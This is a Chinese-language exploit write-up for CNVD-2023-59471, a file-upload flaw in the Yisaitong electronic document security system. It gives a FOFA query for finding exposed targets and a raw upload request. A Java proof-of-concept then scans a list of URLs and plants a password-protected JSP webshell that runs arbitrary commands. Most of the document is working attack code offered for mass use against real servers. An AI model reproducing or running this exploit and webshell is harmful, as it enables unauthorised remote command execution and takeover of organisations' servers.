影响版本
<= V5.x
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 9.8
网络空间测绘
fofa:app=“亿赛通-电子文档安全管理系统”
复现
POST /CDGServer3/UploadFileFromClientServiceForClient?AFMALANMJCEOENIBDJMKFHBANGEPKHNOFJBMIFJPFNKFOKHJNMLCOIDDJGNEIPOLOKGAFAFJHDEJPHEPLFJHDGPBNELNFIICGFNGEOEFBKCDDCGJEPIKFHJFAOOHJEPNNCLFHDAFDNCGBAEELJFFHABJPDPIEEMIBOECDMDLEPBJGBGCGLEMBDFAGOGM HTTP/1.1
Host:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Upgrade-Insecure-Requests: 1
test
访问ip:port/tttT.jsp
poc脚本
package org.example.POC;
import com.github.kevinsawicki.http.HttpRequest;
import java.io.BufferedReader;
import java.io.FileReader;
public class CNVD_2023_59471 {
public static void main(String[] args) {
try (BufferedReader bufferedReader = new BufferedReader(new FileReader("D:\\TempData\\url.txt"))) {
String line;
while ((line = bufferedReader.readLine()) != null) {
checkVuln(line);
}
} catch (Exception e) {
System.out.println(e);
}
}
public static void checkVuln(String URL){
String attackUrl = URL+"/CDGServer3/UploadFileFromClientServiceForClient?AFMALANMJCEOENIBDJMKFHBANGEPKHNOFJBMIFJPFNKFOKHJNMLCOIDDJGNEIPOLOKGAFAFJHDEJPHEPLFJHDGPBNELNFIICGFNGEOEFBKCDDCGJEPIKFHJFAOOHJEPNNCLFHDAFDNCGBAEELJFFHABJPDPIEEMIBOECDMDLEPBJGBGCGLEMBDFAGOGM";
String webShell_poc = "test";
String webShell_addr = URL+"/tttT.jsp";
String webShell_exp = "<% if(\"023\".equals(request.getParameter(\"pwd\"))){ java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter(\"i\")).getInputStream(); int a = -1; byte[] b = new byte[2048]; out.print(\"<pre>\"); while((a=in.read(b))!=-1){ out.println(new String(b)); } out.print(\"</pre>\"); } %>";
try {
int rs = HttpRequest.post(attackUrl).send(webShell_poc).connectTimeout(3000).code();
String content = HttpRequest.get(webShell_addr).connectTimeout(6000).body();
if(rs == 200){
if(content.equals("test")){
System.out.println("[+]目标网站可能存在漏洞!!!");
System.out.println("[+]正在进行getShell,请等待!!!");
//Webshell上传
int rs2 = HttpRequest.post(attackUrl).send(webShell_exp).connectTimeout(3000).code();
if(rs2 == 200){
//Webshell验证
int command_rs = HttpRequest.get(webShell_addr+"?pwd=023&i=whoami").connectTimeout(3000).code();
if(command_rs == 200 ){
System.out.println("[+]Webshell上传成功,地址是"+webShell_addr+"?pwd=023&i=whoami");
}else {
System.out.println("[-]Webshell上传失败!!!可能存在AV被杀掉QWQ");
}
}else {
System.out.println("[-]Webshell上传失败!请更换重新更换尝试上传.....");
}
}else {
System.out.println("[-]Webshell上传失败,请尝试其他JSP木马尝试!!!");
}
}else {
System.out.println("[-]目标网站可能不存在漏洞!!!");
}
} catch (HttpRequest.HttpRequestException e) {
System.out.println("[-]存在网络连接问题-_-!");
}
}
}